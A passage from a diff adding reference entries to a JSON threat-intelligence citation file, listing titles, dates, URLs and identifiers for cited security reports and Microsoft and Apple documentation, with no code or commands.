"2019-07-23T00:00:00Z", + "refs": [ + "https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/" + ], + "source": "MITRE", + "title": "ABADBABE 8BADFOOD: Discovering BADHATCH and a Detailed Look at FIN8's Tooling" + }, + "related": [], + "uuid": "69a45479-e982-58ee-9e2d-caaf825f0ad4", + "value": "Gigamon BADHATCH Jul 2019" + }, + { + "description": "Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.", + "meta": { + "date_accessed": "2022-05-05T00:00:00Z", + "date_published": "2022-01-01T00:00:00Z", + "refs": [ + "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf" + ], + "source": "MITRE", + "title": "A Bad Luck BlackCat" + }, + "related": [], + "uuid": "0d1e9635-b7b6-454b-9482-b1fc7d33bfff", + "value": "bad_luck_blackcat" + }, + { + "description": "Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.", + "meta": { + "date_accessed": "2020-11-18T00:00:00Z", + "date_published": "2020-07-16T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles" + ], + "source": "MITRE", + "title": "A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES" + }, + "related": [], + "uuid": "8819875a-5139-4dae-94c8-e7cc9f847580", + "value": "Cybereason Bazar July 2020" + }, + { + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "meta": { + "date_accessed": "2020-10-30T00:00:00Z", + "date_published": "2020-10-29T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/" + ], + "source": "MITRE", + "title": "A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak" + }, + "related": [], + "uuid": "ae5d4c47-54c9-4f7b-9357-88036c524217", + "value": "Red Canary Hospital Thwarted Ryuk October 2020" + }, + { + "description": "CyberCX Intelligence. (2023, June 19). A bear in wolf’s clothing: Insights into the infrastructure used by Anonymous Sudan to attack Australian organisations. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2023-06-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://cybercx.com.au/blog/a-bear-in-wolfs-clothing/" + ], + "source": "Tidal Cyber", + "title": "A bear in wolf’s clothing: Insights into the infrastructure used by Anonymous Sudan to attack Australian organisations" + }, + "related": [], + "uuid": "68ded9b7-3042-44e0-8bf7-cdba2174a3d8", + "value": "CyberCX Anonymous Sudan June 19 2023" + }, + { + "description": "Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.", + "meta": { + "date_accessed": "2022-08-18T00:00:00Z", + "date_published": "2020-08-12T00:00:00Z", + "refs": [ + "https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service" + ], + "source": "MITRE", + "title": "A Big Catch: Cloud Phishing from Google App Engine and Azure App Service" + }, + "related": [], + "uuid": "25d46bc1-4c05-48d3-95f0-aa3ee1100bf9", + "value": "Netskope Cloud Phishing" + }, + { + "description": "Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.", + "meta": { + "date_accessed": "2019-10-18T00:00:00Z", + "date_published": "2019-10-08T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide" + ], + "source": "MITRE", + "title": "About admin roles" + }, + "related": [], + "uuid": "8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a", + "value": "Microsoft O365 Admin Roles" + }, + { + "description": "Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.", + "meta": { + "date_accessed": "2017-12-08T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx" + ], + "source": "MITRE", + "title": "About Atom Tables" + }, + "related": [], + "uuid": "a22636c8-8e39-4583-93ef-f0b7f0a218d8", + "value": "Microsoft Atom Table" + }, + { + "description": "Microsoft. (2019, July 12). About BITS. Retrieved March 16, 2020.", + "meta": { + "date_accessed": "2020-03-16T00:00:00Z", + "date_published": "2019-07-12T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/bits/about-bits" + ], + "source": "MITRE", + "title": "About BITS" + }, + "related": [], + "uuid": "8d6d47d1-a6ea-4673-8ade-ba61bfeef084", + "value": "Microsoft About BITS" + }, + { + "description": "Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.", + "meta": { + "date_accessed": "2019-06-07T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events" + ], + "source": "MITRE", + "title": "About Event Tracing" + }, + "related": [], + "uuid": "689d944f-ad66-4908-91fb-bb1ecdafe8d9", + "value": "Microsoft About Event Tracing 2018" + }, + { + "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.", + "meta": { + "date_accessed": "2020-09-04T00:00:00Z", + "date_published": "2020-05-13T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7" + ], + "source": "MITRE", + "title": "About History" + }, + "related": [], + "uuid": "6c873fb4-db43-4bad-b5e4-a7d45cbe796f", + "value": "Microsoft PowerShell Command History" + }, + { + "description": "Microsoft. (2021, May 25). About List-View Controls. Retrieved January 4, 2022.", + "meta": { + "date_accessed": "2022-01-04T00:00:00Z", + "date_published": "2021-05-25T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview" + ], + "source": "MITRE", + "title": "About List-View Controls" + }, + "related": [], + "uuid": "7d6c6ba6-cda6-4f27-bfc8-af5b759305ed", + "value": "Microsoft List View Controls" + }, + { + "description": "Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2020-03-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7" + ], + "source": "MITRE", + "title": "about_Logging_Windows" + }, + "related": [], + "uuid": "81c94686-741d-45d7-90f3-0c7979374e87", + "value": "Microsoft PowerShell Logging" + }, + { + "description": "Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021.", + "meta": { + "date_accessed": "2021-04-14T00:00:00Z", + "date_published": "2016-06-13T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html" + ], + "source": "MITRE", + "title": "About Mac Scripting" + }, + "related": [], + "uuid": "d2f32ac1-9b5b-408d-a7ab-d92dd9efe0ed", + "value": "Apple About Mac Scripting 2016" + }, + { + "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.", + "meta": { + "date_accessed": "2019-10-11T00:00:00Z", + "date_published": "2019-05-01T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1" + ], + "source": "MITRE", + "title": "About PowerShell.exe" + }, + "related": [], + "uuid": "2c504602-4f5d-47fc-9780-e1e5041a0b3a", + "value": "PowerShell About 2019" + }, + { + "description": "Microsoft. (2023, February 8). about_PowerShell_exe: EncodedCommand. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "date_published": "2023-02-08T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand" + ], + "source": "MITRE", + "title": "about_PowerShell_exe: EncodedCommand" + }, + "related": [], + "uuid": "7e50721c-c6d5-5449-8326-529da4cf5465", + "value": "Microsoft PowerShellB64" + }, + { + "description": "Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.", + "meta": { + "date_accessed": "2022-02-04T00:00:00Z", + "date_published": "2021-09-27T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles" + ], + "source": "MITRE", + "title": "about_Profiles" + }, + "related": [], + "uuid": "b25ab0bf-c28b-4747-b075-30bcdfbc0e35", + "value": "Microsoft Profiles" + }, + { + "description": "Microsoft. (2017, November 29). About Profiles. Retrieved June 14, 2019.", + "meta": { + "date_accessed": "2019-06-14T00:00:00Z", + "date_published": "2017-11-29T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6" + ], + "source": "MITRE", + "title": "About Profiles" + }, + "related": [], + "uuid": "1da63665-7a96-4bc3-9606-a3575b913819", + "value": "Microsoft About Profiles" + }, + { + "description": "Microsoft. (2019, August 23). About Remote Desktop Services. Retrieved March 28, 2022.", + "meta": { + "date_accessed": "2022-03-28T00:00:00Z", + "date_published": "2019-08-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/win32/termserv/about-terminal-services" + ], + "source": "MITRE", + "title": "About Remote Desktop Services" + }, + "related": [], + "uuid": "a981e013-f839-46e9-9c8a-128c4897f77a", + "value": "Microsoft Remote Desktop Services" + }, + { + "description": "Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.", + "meta": { + "date_accessed": "2016-03-29T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/ms649012" + ], + "source": "MITRE", + "title": "About the Clipboard" + }, + "related": [], + "uuid": "2c1b2d58-a5dc-4aee-8bdb-129a81c10408", + "value": "MSDN Clipboard" + }, + { + "description": "Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.", + "meta": { + "date_accessed": "2018-10-03T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/windows/desktop/ms524405" + ], + "source": "MITRE", + "title": "About the HTML Help Executable Program" + }, + "related": [], + "uuid": "1af226cc-bb93-43c8-972e-367482c5d487", + "value": "Microsoft HTML Help Executable Program" + }, + { + "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.", + "meta": { + "date_accessed": "2016-01-05T00:00:00Z", + "refs": [ + "http://www.uefi.org/about" + ], + "source": "MITRE", + "title": "About UEFI Forum" + }, + "related": [], + "uuid": "2e6fe82c-d90f-42b6-8247-397ab8823c7c", + "value": "About UEFI" + }, + { + "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", + "meta": { + "date_accessed": "2017-12-16T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx" + ], + "source": "MITRE", + "title": "About Window Classes" + }, + "related": [], + "uuid": "cc620fcd-1f4a-4670-84b5-3f12c9b85053", + "value": "Microsoft Window Classes" + }, + { + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.", + "meta": { + "date_accessed": "2020-08-05T00:00:00Z", + "date_published": "2020-01-15T00:00:00Z", + "refs": [ + "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware" + ], + "source": "MITRE", + "title": "A Brief History of Sodinokibi" + }, + "related": [], + "uuid": "2e9c2206-a04e-4278-9492-830cc9347ff9", + "value": "Picus Sodinokibi January 2020" + }, + { + "description": "Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.", + "meta": { + "date_accessed": "2022-09-27T00:00:00Z", + "date_published": "2022-08-09T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/mac-application-bundles/" + ], + "source": "MITRE", + "title": "A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation" + }, + "related": [], + "uuid": "2a8fd573-6ab0-403b-b813-88d9d3edab36", + "value": "Application Bundle Manipulation Brandon Dalton" + }, + { + "description": "Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.", + "meta": { + "date_accessed": "2021-01-19T00:00:00Z", + "date_published": "2021-01-12T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/" + ], + "source": "MITRE", + "title": "Abusing cloud services to fly under the radar" + }, + "related": [], + "uuid": "70c217c3-83a2-40f2-8f47-b68d8bd4cdf0", + "value": "NCC Group Chimera January 2021" + }, + { + "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.", + "meta": { + "date_accessed": "2019-03-05T00:00:00Z", + "date_published": "2016-03-17T00:00:00Z", + "refs": [ + "http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/" + ], + "source": "MITRE", + "title": "Abusing GPO Permissions" + }, + "related": [], + "uuid": "18cc9426-9b51-46fa-9106-99688385ebe4", + "value": "Harmj0y Abusing GPO Permissions" + }, + { + "description": "Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.", + "meta": { + "date_accessed": "2018-04-12T00:00:00Z", + "date_published": "2017-11-13T00:00:00Z", + "refs": [ + "https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html" + ], + "source": "MITRE", + "title": "Abusing network shares for efficient lateral movements and privesc (DirSharePivot)" + }, + "related": [], + "uuid": "027c5274-6b61-447a-9058-edb844f112dd", + "value": "Retwin Directory Share Pivot" + }, + { + "description": "BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.", + "meta": { + "date_accessed": "2020-08-10T00:00:00Z", + "date_published": "2018-08-18T00:00:00Z", + "refs": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "source": "MITRE", + "title": "Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques" + }, + "related": [], + "uuid": "3b5c0e62-7ac9-42e1-b2dd-8f2e0739b9d7", + "value": "BOHOPS Abusing the COM Registry" + }, + { + "description": "bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2018-08-18T00:00:00Z", + "refs": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "source": "MITRE", + "title": "ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES" + }, + "related": [], + "uuid": "7f0f223f-09b1-4f8f-b6f1-1044e2ac7066", + "value": "abusing_com_reg" + }, + { + "description": "Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.", + "meta": { + "date_accessed": "2022-03-17T00:00:00Z", + "date_published": "2019-09-17T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/" + ], + "source": "MITRE", + "title": "Abusing VPC Traffic Mirroring in AWS" + }, + "related": [], + "uuid": "09cac813-862c-47c8-a47f-154c5436afbb", + "value": "Rhino Security Labs AWS VPC Traffic Mirroring" + }, + { + "description": "Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.", + "meta": { + "date_accessed": "2020-04-28T00:00:00Z", + "date_published": "2019-10-19T00:00:00Z", + "refs": [ + "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html" + ], + "source": "MITRE", + "title": "Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence" + }, + "related": [], + "uuid": "fc889ba3-79a5-445a-81ea-dfe81c1cc542", + "value": "Narrator Accessibility Abuse" + }, + { + "description": "Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2019-11-18T00:00:00Z", + "refs": [ + "https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/" + ], + "source": "MITRE", + "title": "ACBackdoor: Analysis of a New Multiplatform Backdoor" + }, + "related": [], + "uuid": "e6cb833f-cf18-498b-a233-848853423412", + "value": "Intezer ACBackdoor" + }, + { + "description": "LOLBAS. (2022, January 2). AccCheckConsole.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-01-02T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/" + ], + "source": "Tidal Cyber", + "title": "AccCheckConsole.exe" + }, + "related": [], + "uuid": "de5523bd-e735-4751-84e9-a1be1d2980ec", + "value": "AccCheckConsole.exe - LOLBAS Project" + }, + { + "description": "Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.", + "meta": { + "date_accessed": "2019-07-16T00:00:00Z", + "date_published": "2018-11-29T00:00:00Z", + "refs": [ + "https://www.cyberscoop.com/apt28-brexit-phishing-accenture/" + ], + "source": "MITRE", + "title": "Accenture: Russian hackers using Brexit talks to disguise phishing lures" + }, + "related": [], + "uuid": "ef8f0990-b2da-4538-8b02-7401dc5a4120", + "value": "CyberScoop APT28 Nov 2018" + }, + { + "description": "Microsoft Azure. (2023, April 28). Access and identity options for Azure Kubernetes Service (AKS). Retrieved July 14, 2023.", + "meta": { + "date_accessed": "2023-07-14T00:00:00Z", + "date_published": "2023-04-28T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/aks/concepts-identity" + ], + "source": "MITRE", + "title": "Access and identity options for Azure Kubernetes Service (AKS)" + }, + "related": [], + "uuid": "bf374b41-b2a3-5c07-bf84-9ea0e1a9e6c5", + "value": "Microsoft Azure Kubernetes Service Service Accounts" + }, + { + "description": "CrowdStrike Intelligence Team. (2022, February 23). Access Brokers: Who Are the Targets, and What Are They Worth?. Retrieved March 10, 2023.", + "meta": { + "date_accessed": "2023-03-10T00:00:00Z", + "date_published": "2022-02-23T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/" + ], + "source": "MITRE", + "title": "Access Brokers: Who Are the Targets, and What Are They Worth?" + }, + "related": [], + "uuid": "0f772693-e09d-5c82-85c2-77f5fee39ef0", + "value": "CrowdStrike Access Brokers" + }, + { + "description": "M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.", + "meta": { + "date_accessed": "2020-02-04T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists" + ], + "source": "MITRE", + "title": "Access Control Lists" + }, + "related": [], + "uuid": "2aeda95a-7741-4a74-a5a4-29a9e7a89451", + "value": "Microsoft Access Control Lists May 2018" + }, + { + "description": "Auth0. (n.d.). Access Tokens. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "refs": [ + "https://auth0.com/docs/tokens/access-tokens" + ], + "source": "MITRE", + "title": "Access Tokens" + }, + "related": [], + "uuid": "43e8e178-a0da-44d8-be1b-853307e0d4ae", + "value": "Auth0 Access Tokens" + }, + { + "description": "French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger Than Its Weakest LNK. Retrieved November 30, 2020.", + "meta": { + "date_accessed": "2020-11-30T00:00:00Z", + "date_published": "2020-03-21T00:00:00Z", + "refs": [ + "https://www.youtube.com/watch?v=nJ0UsyiUEqQ" + ], + "source": "MITRE", + "title": "A Chain Is No Stronger Than Its Weakest LNK" + }, + "related": [], + "uuid": "4c2ede51-33f6-4d09-9186-43b023b079c0", + "value": "BSidesSLC 2020 - LNK Elastic" + }, + { + "description": "Thomas, C. (2020, August 13). A Change of Mythic Proportions. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2020-08-13T00:00:00Z", + "refs": [ + "https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617" + ], + "source": "MITRE", + "title": "A Change of Mythic Proportions" + }, + "related": [], + "uuid": "98d4453e-2e80-422a-ac8c-47f650f46e3c", + "value": "Mythic SpecterOps" + }, + { + "description": "Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021.", + "meta": { + "date_accessed": "2021-10-17T00:00:00Z", + "date_published": "2019-10-10T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions" + }, + "related": [], + "uuid": "d37c069c-7fb8-44e1-8377-da97e8bbcf67", + "value": "FireEye Chinese Espionage October 2019" + }, + { + "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.", + "meta": { + "date_accessed": "2021-03-16T00:00:00Z", + "date_published": "2020-06-17T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/acidbox-rare-malware/" + ], + "source": "MITRE", + "title": "AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations" + }, + "related": [], + "uuid": "f3f2eca0-fda3-451e-bf13-aacb14668e48", + "value": "Unit42 AcidBox June 2020" + }, + { + "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2018-06-08T00:00:00Z", + "refs": [ + "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html" + ], + "source": "MITRE", + "title": "acroread package compromised" + }, + "related": [], + "uuid": "99245022-2130-404d-bf7a-095d84a515cd", + "value": "acroread package compromised Arch Linux Mail 8JUL2018" + }, + { + "description": "Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.", + "meta": { + "date_accessed": "2022-02-18T00:00:00Z", + "date_published": "2022-02-04T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/" + ], + "source": "MITRE", + "title": "ACTINIUM targets Ukrainian organizations" + }, + "related": [], + "uuid": "5ab658db-7f71-4213-8146-e22da54160b3", + "value": "Microsoft Actinium February 2022" + }, + { + "description": "Wikipedia. (2018, March 10). Active Directory. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2018-03-10T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Active_Directory" + ], + "source": "MITRE", + "title": "Active Directory" + }, + "related": [], + "uuid": "924e1186-57e5-43db-94ab-29afa3fdaa7b", + "value": "Wikipedia Active Directory" + }, + { + "description": "Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "date_published": "2019-08-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts" + ], + "source": "MITRE", + "title": "Active Directory Accounts" + }, + "related": [], + "uuid": "df734659-2441-487a-991d-59064c61b771", + "value": "Microsoft AD Accounts" + }, + { + "description": "Microsoft. (2019, February 14). Active Directory administrative tier model. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2019-02-14T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Active Directory administrative tier model" + }, + "related": [], + "uuid": "3afba81a-3b1d-41ec-938e-24f055698d52", + "value": "Microsoft AD Admin Tier Model" + }, + { + "description": "Microsoft. (2016, August 31). Active Directory Certificate Services Overview. Retrieved August 2, 2022.", + "meta": { + "date_accessed": "2022-08-02T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)" + ], + "source": "MITRE", + "title": "Active Directory Certificate Services Overview" + }, + "related": [], + "uuid": "f1b2526a-1bf6-4954-a9b3-a5e008761ceb", + "value": "Microsoft AD CS Overview" + }, + { + "description": "Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/ee617241.aspx" + ], + "source": "MITRE", + "title": "Active Directory Cmdlets - Get-ADUser" + }, + "related": [], + "uuid": "b68ac85e-a007-4a72-9185-2877e9184fad", + "value": "Microsoft Get-ADUser" + }, + { + "description": "Microsoft. (2023, June 26). Active Directory Enumeration with LDIFDE. Retrieved July 11, 2023.", + "meta": { + "date_accessed": "2023-07-11T00:00:00Z", + "date_published": "2023-06-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md#atomic-test-14---active-directory-enumeration-with-ldifde" + ], + "source": "Tidal Cyber", + "title": "Active Directory Enumeration with LDIFDE" + }, + "related": [], + "uuid": "51e6623a-4448-4244-8c81-4eab102e5926", + "value": "Active Directory Enumeration with LDIFDE" + }, + { + "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/ms679833.aspx" + ], + "source": "MITRE", + "title": "Active Directory Schema - SID-History attribute" + }, + "related": [], + "uuid": "32150673-5593-4a2c-9872-aaa96a21aa5c", + "value": "Microsoft SID-History Attribute" + }, + { + "description": "Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.", + "meta": { + "date_accessed": "2017-03-09T00:00:00Z", + "date_published": "2014-06-30T00:00:00Z", + "refs": [ + "https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/" + ], + "source": "MITRE", + "title": "Active malware operation let attackers sabotage US energy industry" + }, + "related": [], + "uuid": "f2ef73c6-5d4c-423e-a3f5-194cba121eb1", + "value": "ActiveMalwareEnergy" + }, + { + "description": "Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2010-04-22T00:00:00Z", + "refs": [ + "https://helgeklein.com/blog/2010/04/active-setup-explained/" + ], + "source": "MITRE", + "title": "Active Setup Explained" + }, + "related": [], + "uuid": "cbdd6290-1dda-48af-a101-fb3db6581276", + "value": "Klein Active Setup 2010" + }, + { + "description": "Dark Vortex. (n.d.). A Customized Command and Control Center for Red Team and Adversary Simulation. Retrieved February 7, 2023.", + "meta": { + "date_accessed": "2023-02-07T00:00:00Z", + "refs": [ + "https://bruteratel.com/" + ], + "source": "MITRE", + "title": "A Customized Command and Control Center for Red Team and Adversary Simulation" + }, + "related": [], + "uuid": "47992cb5-df11-56c2-b266-6f58d75f8315", + "value": "Dark Vortex Brute Ratel C4" + }, + { + "description": "Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.", + "meta": { + "date_accessed": "2021-10-28T00:00:00Z", + "date_published": "2021-03-10T00:00:00Z", + "refs": [ + "https://securelist.com/ad-blocker-with-miner-included/101105/" + ], + "source": "MITRE", + "title": "Ad blocker with miner included" + }, + "related": [], + "uuid": "8e30f71e-80b8-4662-bc95-bf3cf7cfcf40", + "value": "ad_blocker_with_miner" + }, + { + "description": "Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.", + "meta": { + "date_accessed": "2019-10-18T00:00:00Z", + "refs": [ + "https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d" + ], + "source": "MITRE", + "title": "Add Another Admin" + }, + "related": [], + "uuid": "c31cfc48-289e-42aa-8046-b41261fdeb96", + "value": "Microsoft Support O365 Add Another Admin, October 2019" + }, + { + "description": "MacCarthaigh, C. (2019, November 19). Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service. Retrieved October 14, 2020.", + "meta": { + "date_accessed": "2020-10-14T00:00:00Z", + "date_published": "2019-11-19T00:00:00Z", + "refs": [ + "https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/" + ], + "source": "MITRE", + "title": "Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service" + }, + "related": [], + "uuid": "f252eb18-86e9-4ed0-b9da-2c81f12a6e13", + "value": "Amazon AWS IMDS V2" + }, + { + "description": "Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.", + "meta": { + "date_accessed": "2017-07-11T00:00:00Z", + "date_published": "2016-09-13T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html" + ], + 